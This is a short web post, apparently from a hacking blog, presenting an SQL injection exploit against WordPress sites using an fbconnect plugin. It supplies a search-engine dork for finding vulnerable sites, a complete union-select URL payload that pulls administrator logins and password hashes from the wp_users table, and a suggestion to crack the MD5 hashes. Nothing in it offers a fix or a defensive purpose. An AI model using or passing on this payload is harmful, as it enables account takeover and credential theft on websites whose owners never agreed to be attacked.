Skip to main content

WordPress Blog Exploit - SQL Injection

Dork: inurl:"fbconnect_action=myhome"

You will be get such info of admin on page.

Just change this part of URL: ?fbconnect_action=myhome&userid=

With This part of URL: ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--

Now You will be get Username and Password of Admin.

Than Just Encrypt Password In any MD5 Cracker.